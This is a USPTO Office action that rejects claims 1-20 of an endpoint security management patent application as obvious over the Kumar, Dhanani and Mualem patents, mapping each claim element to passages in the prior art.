Notice of Pre-AIA  or AIA  Status
The present application, filed on or after March 16, 2013, is being examined under the first inventor to file provisions of the AIA .

Information Disclosure Statement

1.	The information disclosure statement (IDS) submitted on 9/28/2020 was filed.  The submission is in compliance with the provisions of 37 CFR 1.97.  Accordingly, the information disclosure statement is being considered by the examiner.

DETAILED ACTION
2. 	Pending claims for consideration are claims 1-20. Applicant has amended claim 1.

3. 	A request for continued examination under 37 CFR 1.114, including the fee set forth in 37 CFR 1.17(e), was filed in this application after final rejection. Since this application is eligible for continued examination under 37 CFR 1,114, and the fee set forth in 37 CFR 1.17(e) has been timely paid, the finality of the previous Office action has been withdrawn pursuant to 37 CFR 1.114. Applicant's submission filed on 9/28/2020 has been entered.

Response to Arguments



Claim Rejections - 35 USC § 103

The following is a quotation of 35 U.S.C. 103 which forms the basis for all obviousness rejections set forth in this Office action:
A patent for a claimed invention may not be obtained, notwithstanding that the claimed invention is not identically disclosed as set forth in section 102, if the differences between the claimed invention and the prior art are such that the claimed invention as a whole would have been obvious before the effective filing date of the claimed invention to a person having ordinary skill in the art to which the claimed invention pertains. Patentability shall not be negated by the manner in which the invention was made.



5.	Claims 1-20 are rejected under 35 U.S.C. 103 as being unpatentable over Patent No.: US 9,092,616 B2 to Kumar et al (hereafter referenced as Kumar) in view of in further view of  Patent No.: US 8,032,940 B1 to Dhanani, in further view of Patent No.: US 7,463,590 B2 to Mualem et al (hereafter referenced as Mualem).
Regarding claim 1, Kumar discloses “a system for providing an integrated, context-aware, security management framework for an enterprise” (Tokenization of identities by Security Token Services (STS) intended to facilitate in Identity Federation and Single Sign. On (SSO) for web and Enterprise applications [Col.3/lines 21-23]) , “the system comprising: one or more endpoint devices”(endpoint trust agent [Col.13/lines 4-5]); “and a server configured to communicate and exchange data with the one or more endpoint devices over a network”(server device [Col.13/lines 20-21]),  “the server comprising a hardware processor coupled to non-(endpoint trust agent/server [Fig.8/item 510]) , “in real time, or near-real time, functionality of at least one endpoint agent deployed on one of the one or more endpoint devices” (trust supervisor sends real time actions to remediation controller [Col.18/lines 28-39]), 
Kumar does not explicitly disclose “provide an integrated development environment (IDE) operably coupled to the interface; input to the IDE, to write, develop, and/or modify, on-the-fly, one or more customized sets of detection and response logic rules to be executed by an endpoint agent”  
However, Dhanani in an analogous art discloses “provide an integrated development environment (IDE) (secure IDE Dhanani [Fig.4/item 200] within server 414) operably coupled to the interface” (coupled to intrusion detection extension interface Dhanani[Fig4/item 214]);  “ input to the IDE (IDE platform extension Dhanani [Fig.4/item214] interconnected to Client Dhanani[Fig.4/item 412]  interface comprising control module security extensions to provide a secure IDE Dhanani[Col.4/lines 35-37]) ,  “to write, develop, and/or modify, on-the-fly, one or more customized sets of detection and response logic rules to be executed by an endpoint agent” (keystore interface security extension 206 of the IDE platform 202 is used to enable the IDE to communicate with (e.g., read and write from) with other keystore objects or components Dhanani [Col.5/lines 2-4]). 

One of ordinary skill in the art would have been motivated to combine because Kumar teaches a threat identification and remediation process comprising a security management platform comprising an interface with which an authorized user associated with the enterprise can interact to monitor endpoint agent activity via an endpoint trust agent/server, Dhanani discloses a process to provide a secure Integrated development environment, and both are from the same field of endeavor.
Neither Kumar nor Dhanani explicitly disclose “each endpoint device comprising a deployed endpoint agent configured to continuously monitor and record activity on the respective endpoint device and further execute one or more sets of detection and response logic rules for managing the detection of, and response to, any activity associated with the respective endpoint device that poses a potential security threat to the enterprise, receive, from the authorized user via the interface, and output, to the endpoint agent, a customized set of detection and response logic rules.”
However, Mualem in an analogous art discloses “each endpoint device comprising a deployed endpoint agent configured to continuously monitor and record activity on the respective endpoint device (Network Manager Daemon (or NMDs) that perform the processing of the parser and analyzer portions in this embodiment, saving, analyzing, aggregating packets from each threat detection system, and propagating information to processing routines of the IMC Core Mualem[Col.19/lines 38-52])  “and further execute one or more sets of detection and response logic rules for managing (management and administration portion of threat detection response system Mualem [Fig.3/item 180])  the detection of, and response to, any activity associated with the respective endpoint device that poses a potential security threat to the enterprise”(threat detection system Mualem[Fig.3]), “receive, from the authorized user via the interface via the interface ”(permission detection module Mualem[Col.12/lines 23-25])  , and output, to the endpoint agent, a customized set of detection and response logic rules.”(Threat detection library of rules Mualem [Col.6/lines 60-61]). 
Therefore, it would have been obvious to one of ordinary skill in the art at the time the invention was filed to modify Kumar’s method for threat identification  remediation, and Dhanani’s secured integrated development environment, with Mualem’s method for threat detection and response in which a network intrusion detection system (Mualem [Fig.3]) which utilizes a that Network Manager Daemon (or NMDs) that perform the processing of the parser and analyzer portions saving, analyzing, aggregating packets from each threat detection system, and propagating information to processing routines of the IMC Core in order to provide additional security and data integrity. 
One of ordinary skill in the art would have been motivated to combine because Kumar teaches a threat identification and remediation process comprising a security management platform comprising an interface with which an authorized user associated with the enterprise can interact to monitor endpoint agent activity via an endpoint trust agent/server, Dhanani discloses a process to provide a secure Integrated development 
Regarding claim 2 in view of claim 1, the references combined disclose “wherein the server is configured to receive, from the endpoint agent, security data based on execution of one or more sets of detection and response logic rules”( The threat signature detection module in step S45 provides a library of rules Which evaluate every packet Mualem[Col.6/lines 56-57]). 
Regarding claim 3 in view of claim 2, the references combined disclose “wherein the endpoint agent comprises one or more collection modules configured to monitor activities of processes and user on the respective endpoint device in real time, or near-real time, via a range of kernel mode and/or user mode information sources” (mmap extension of packet sockets allows the kernel to make packets available to the analysis modules Mualem [Col.15/lines 34-36]). 
Regarding claim 4 in view of claim 3, the references combined disclose “wherein the one or more collection modules are configured to: generate event data based on the monitoring of activities”(threat analysis Mualem[Fig.3] also see user interface threat management system Mualem[Fig.9]) ;  “and transmit the event data to a logic engine of the endpoint agent (event data transferred from analysis module to threat management system [Fig.9])  to undergo analysis based on execution of detection and response logic rules for the determination of a one or more actions to be performed based on the analysis of the event data” (threat analysis Mualem[Fig.3] also see user interface threat management system Mualem[Fig.9]) 
Regarding claim 5 in view of claim 4, the references combined disclose “wherein the activities comprise one or more events selected from the group consisting of removable media events, file events, session events, network events, name lookup events, process events, registry events, print events, image load events, and object access events”(analyzer portion Mualem[Fig.4/item 244]) .
Regarding claim 6 in view of claim 5, the references combined disclose “wherein the one or more events are selected from the group consisting of process start/stop, insertion/removal of removable media, establishment/termination of network connections, writes to a file system, printing of one or more documents, Domain Name System (DNS) name resolution attempts, and writes to an operating system registry” (reject filter packet, send alert Mualem [Fig.1/item s72-s78]). 
Regarding claim 7 in view of claim 4, the references combined disclose “wherein the set of detection and response logic rules comprises at least one rule statement comprising match criteria and an associated action” (analyzer portion Mualem [Fig.4/irwm 244]). 
Regarding claim 8 in view of claim 7, the references combined disclose “wherein the analysis comprises: comparing the event data with the match criteria” (anomaly detected Mualem [Fig.1/item s20]); “and determine an associated action to be performed by the endpoint agent based on a positive correlation of the event data with the match criteria” (threat signatures used by the threat signature detection module may utilize a generic form. For example, each signature may include: a) A set of actions to take upon a match of the signature Mualem [Col.7/lines 8-15]).
 claim 9 in view of claim 8, the references combined disclose “wherein the associated action is selected from the group consisting of a suppress action, an alert action, a forward action, a block action, a kill process action, an isolate action, and a set action.”(reject filter packet, send alert Mualem [Fig.1/item s72-s78]).
Regarding claim 10 in view of claim 9, the references combined disclose “wherein the suppress action comprises preventing recording of event data to a forensic log file in a database based on a positive correlation of the event data with a suppress rule match criteria” (reject filter packet, send alert Mualem[Fig.1/item s72-s78]). 
Regarding claim 11 in view of claim 9, the references combined disclose “wherein the alert action comprises transmitting an alert to the endpoint server indicative of event data requiring attention based on a positive correlation of the event data with an alert rule match criteria” (reject filter packet, send alert Mualem[Fig.1/item s72-s78]).
Regarding claim 12 in view of claim 9, the references combined disclose “wherein the forward action comprises transmitting a communication to the endpoint server comprising a copy of event data based on a positive correlation of the event data with a forward rule match criteria” (set action, reassemble packets, send complete frame Mualem[Fig.1]). 
Regarding claim 13 in view of claim 9, the references combined disclose “wherein the block action comprises blocking execution of a process associated with event data based on a positive correlation of the event data with a block rule match criteria” (reject filter packet, send alert Mualem[Fig.1/item s72-s78]). 
 claim 14 in view of claim 9, the references combined disclose “wherein the kill process action comprises terminating a process associated with event data and having already been executed based on a positive correlation of the event data with a kill process rule match criteria.” (analyzer portion Mualem [Fig.4/irwm 244]). 
Regarding claim 15 in view of claim 9, the references combined disclose “wherein the isolate action comprises isolating, over the network, the endpoint agent and endpoint device from other endpoint agents and endpoint devices” (reject filter packet, send alert Mualem[Fig.1/item s72-s78 ]).
Regarding claim 16 in view of claim 9, the references combined disclose “wherein the set action comprises modifying one or more state variables associated with rule statements of matching criteria.” (analyzer portion Mualem [Fig.4/irwm 244]). 
Regarding claim 17 in view of claim 1, the references combined disclose “wherein the one or more customized sets of detection and response logic rules are generated based on a custom, declarative programming language, wherein the custom, declarative programming language is compiled, via a compiler module, into byte code, wherein the compiler module is configured to output a compiled rule set.”(threat detection module Mualem [Fig.3]). 
Regarding claim 18 in view of claim 17, the references combined disclose “wherein the customized set of detection and response logic rules outputted from the server comprises a compiled rule set embedded into an installer executable by the endpoint agent to thereby transmit the compiled rule set to the endpoint agent such that (threat detection module Mualem [Fig.3]). 
Regarding claim 19 in view of claim 1, the references combined disclose “wherein the authorized user is an individual or group tasked with managing the enterprise's security posture and the enterprise comprises at least one of a business entity, company, organization, and government agency” (FIG. 9 can be used to consolidate and correlate a plurality of identity, inventory and log management systems in order to determine a reputation of a subject e.g., a user, device, transaction, service, or organization/company Mualem[Col.20/ line 64-67]). 
Regarding claim 20 in view of claim 1, the references combined disclose “wherein the customized set of detection and response logic rules is based on at least one of the enterprise's operations”, the enterprise's infrastructure, user-based processes within the enterprise, the enterprise's security policies, industry-specific rules and regulations associated with the enterprise, known security threats and techniques, and new emerging security threats and techniques” (threat detection module Mualem[Fig.3]). 

Conclusion

Any inquiry concerning this communication or earlier communications from the examiner should be directed to MICHAEL D ANDERSON whose telephone number is (571)270-5159.  The examiner can normally be reached on Mon-Fri 9am-6pm.

If attempts to reach the examiner by telephone are unsuccessful, the examiner’s supervisor, Yin-Chen Shaw can be reached on (571) 272-8878.  The fax phone number for the organization where this application or proceeding is assigned is 571-273-8300.
Information regarding the status of an application may be obtained from the Patent Application Information Retrieval (PAIR) system.  Status information for published applications may be obtained from either Private PAIR or Public PAIR.  Status information for unpublished applications is available through Private PAIR only.  For more information about the PAIR system, see https://ppair-my.uspto.gov/pair/PrivatePair. Should you have questions on access to the Private PAIR system, contact the Electronic Business Center (EBC) at 866-217-9197 (toll-free). If you would like assistance from a USPTO Customer Service Representative or access to the automated information system, call 800-786-9199 (IN USA OR CANADA) or 571-272-1000.
	


/MICHAEL D ANDERSON/
Examiner, Art Unit 2432      

/JOHN B KING/Primary Examiner, Art Unit 2498